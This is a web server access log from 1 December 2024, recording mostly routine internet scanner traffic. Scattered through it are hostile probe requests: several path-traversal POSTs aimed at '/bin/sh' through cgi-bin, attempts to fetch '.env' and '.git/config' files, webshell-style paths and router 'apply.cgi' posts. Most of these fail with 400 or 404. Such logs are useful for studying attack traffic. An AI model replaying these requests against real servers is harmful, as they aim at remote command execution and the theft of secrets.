147.135.85.134 - - [01/Dec/2024:02:24:27 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
194.50.16.198 - - [01/Dec/2024:02:24:34 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
47.245.117.221 - - [01/Dec/2024:02:26:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
59.126.252.210 - - [01/Dec/2024:02:29:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
18.170.37.253 - - [01/Dec/2024:02:30:01 +0100] "\xab\x19\xa4;\x10Ll\xec`\x10\x04\xb0/-" 501 329 "-" "-"
167.94.145.101 - - [01/Dec/2024:02:30:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.101 - - [01/Dec/2024:02:30:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [01/Dec/2024:02:30:24 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [01/Dec/2024:02:30:24 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
194.50.16.198 - - [01/Dec/2024:02:33:33 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
46.19.138.234 - - [01/Dec/2024:02:38:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.127 - - [01/Dec/2024:02:43:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36"
194.50.16.198 - - [01/Dec/2024:02:45:22 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
125.229.225.159 - - [01/Dec/2024:02:45:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
64.62.197.133 - - [01/Dec/2024:02:46:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
64.62.197.122 - - [01/Dec/2024:02:46:34 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36"
147.185.132.49 - - [01/Dec/2024:02:58:24 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
147.185.132.99 - - [01/Dec/2024:03:01:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.99 - - [01/Dec/2024:03:01:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
122.116.183.60 - - [01/Dec/2024:03:01:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
185.191.126.248 - - [01/Dec/2024:03:01:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.248 - - [01/Dec/2024:03:03:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.202 - - [01/Dec/2024:03:03:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.248 - - [01/Dec/2024:03:03:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
8.211.162.45 - - [01/Dec/2024:03:04:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
95.214.53.202 - - [01/Dec/2024:03:07:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.205 - - [01/Dec/2024:03:08:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.35 - - [01/Dec/2024:03:08:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.202 - - [01/Dec/2024:03:09:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.202 - - [01/Dec/2024:03:09:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.11.34 - - [01/Dec/2024:03:10:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
172.105.128.12 - - [01/Dec/2024:03:11:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.35 - - [01/Dec/2024:03:11:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.35 - - [01/Dec/2024:03:11:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.13 - - [01/Dec/2024:03:13:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.35 - - [01/Dec/2024:03:14:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.202 - - [01/Dec/2024:03:16:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
104.248.143.191 - - [01/Dec/2024:03:17:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
104.248.143.191 - - [01/Dec/2024:03:17:12 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.89/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
69.164.217.245 - - [01/Dec/2024:03:18:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [01/Dec/2024:03:18:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
95.214.53.205 - - [01/Dec/2024:03:21:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.205 - - [01/Dec/2024:03:21:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.202 - - [01/Dec/2024:03:21:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.248 - - [01/Dec/2024:03:22:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.236.161.151 - - [01/Dec/2024:03:25:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
57.129.64.10 - - [01/Dec/2024:03:27:37 +0100] "SSH-2.0-Go" 501 325 "-" "-"
95.214.53.202 - - [01/Dec/2024:03:28:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
184.105.247.252 - - [01/Dec/2024:03:29:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
184.105.247.252 - - [01/Dec/2024:03:29:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.248 - - [01/Dec/2024:03:30:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
34.219.85.74 - - [01/Dec/2024:03:30:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.3"
202.95.12.147 - - [01/Dec/2024:03:32:12 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
94.141.120.99 - - [01/Dec/2024:03:32:43 +0100] "POST /cgi-bin/hotspotlogin.cgi HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
95.214.53.202 - - [01/Dec/2024:03:34:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
180.241.44.179 - - [01/Dec/2024:03:39:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
141.98.11.35 - - [01/Dec/2024:03:40:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.205 - - [01/Dec/2024:03:44:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.248 - - [01/Dec/2024:03:48:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:03:50:24 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.81:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
89.248.168.227 - - [01/Dec/2024:03:51:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
89.248.168.227 - - [01/Dec/2024:03:51:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.4 - - [01/Dec/2024:03:52:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
141.98.11.35 - - [01/Dec/2024:03:52:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.181.223 - - [01/Dec/2024:03:52:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
47.251.13.59 - - [01/Dec/2024:03:53:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.133.122 - - [01/Dec/2024:03:55:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.216 - - [01/Dec/2024:03:57:31 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
179.43.133.122 - - [01/Dec/2024:03:57:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.248 - - [01/Dec/2024:03:57:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:03:59:32 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.82:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
95.214.55.79 - - [01/Dec/2024:03:59:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.141.120.99 - - [01/Dec/2024:04:00:29 +0100] "POST /cgi-bin/hotspotlogin.cgi HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
185.191.126.248 - - [01/Dec/2024:04:01:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.175 - - [01/Dec/2024:04:01:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.175 - - [01/Dec/2024:04:01:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.175 - - [01/Dec/2024:04:03:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.175 - - [01/Dec/2024:04:03:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.79 - - [01/Dec/2024:04:05:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.248 - - [01/Dec/2024:04:05:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.205 - - [01/Dec/2024:04:05:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [01/Dec/2024:04:05:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
93.174.93.12 - - [01/Dec/2024:04:06:17 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
93.174.93.12 - - [01/Dec/2024:04:07:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
185.191.126.248 - - [01/Dec/2024:04:07:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [01/Dec/2024:04:07:31 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
179.43.133.122 - - [01/Dec/2024:04:07:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [01/Dec/2024:04:07:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
93.174.93.12 - - [01/Dec/2024:04:08:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
93.174.93.12 - - [01/Dec/2024:04:08:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
194.50.16.198 - - [01/Dec/2024:04:09:06 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.84:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
167.94.145.99 - - [01/Dec/2024:04:09:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.99 - - [01/Dec/2024:04:09:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [01/Dec/2024:04:09:19 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [01/Dec/2024:04:09:19 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
141.98.11.35 - - [01/Dec/2024:04:10:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:04:11:32 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.87:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
114.33.126.55 - - [01/Dec/2024:04:12:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
179.43.133.122 - - [01/Dec/2024:04:13:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.248 - - [01/Dec/2024:04:16:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:04:17:51 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.85:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
66.249.66.88 - - [01/Dec/2024:04:20:51 +0100] "GET /web41/log/error.log HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
92.255.57.51 - - [01/Dec/2024:04:21:09 +0100] "\x03" 501 316 "-" "-"
194.50.16.198 - - [01/Dec/2024:04:22:59 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.88:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
95.214.53.205 - - [01/Dec/2024:04:24:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.133.122 - - [01/Dec/2024:04:24:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
8.222.226.153 - - [01/Dec/2024:04:24:55 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.191.126.248 - - [01/Dec/2024:04:25:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:04:26:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:04:26:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:04:26:59 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:04:27:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:04:27:01 +0100] "GET /.env.preprod HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:04:27:01 +0100] "GET /config/.env HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:04:27:02 +0100] "GET /media../.git/config HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:04:27:02 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:04:27:02 +0100] "GET /.env.docker-compose HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
185.191.126.248 - - [01/Dec/2024:04:28:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.79 - - [01/Dec/2024:04:31:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.46 - - [01/Dec/2024:04:31:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.46 - - [01/Dec/2024:04:31:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.46 - - [01/Dec/2024:04:32:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.46 - - [01/Dec/2024:04:32:00 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
54.219.82.206 - - [01/Dec/2024:04:32:44 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
159.203.186.253 - - [01/Dec/2024:04:32:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.203.186.253 - - [01/Dec/2024:04:32:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.203.186.253 - - [01/Dec/2024:04:32:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.186.253 - - [01/Dec/2024:04:32:49 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
159.203.186.253 - - [01/Dec/2024:04:32:49 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
159.203.186.253 - - [01/Dec/2024:04:32:49 +0100] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
159.203.186.253 - - [01/Dec/2024:04:32:50 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.186.253 - - [01/Dec/2024:04:32:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.186.253 - - [01/Dec/2024:04:32:50 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.186.253 - - [01/Dec/2024:04:32:50 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.186.253 - - [01/Dec/2024:04:32:50 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
141.98.11.35 - - [01/Dec/2024:04:32:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.168.227 - - [01/Dec/2024:04:33:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
194.50.16.198 - - [01/Dec/2024:04:33:37 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.86:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
95.214.55.79 - - [01/Dec/2024:04:34:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.79 - - [01/Dec/2024:04:35:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.50.16.198 - - [01/Dec/2024:04:36:03 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.89:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
89.248.168.227 - - [01/Dec/2024:04:36:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
141.98.11.35 - - [01/Dec/2024:04:36:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.92.85.71 - - [01/Dec/2024:04:38:12 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
179.43.133.122 - - [01/Dec/2024:04:38:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.79 - - [01/Dec/2024:04:38:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.133.122 - - [01/Dec/2024:04:39:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.248 - - [01/Dec/2024:04:40:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:04:41:11 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.80:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
89.248.168.227 - - [01/Dec/2024:04:42:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
8.222.164.201 - - [01/Dec/2024:04:44:30 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
194.50.16.198 - - [01/Dec/2024:04:46:18 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.83:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
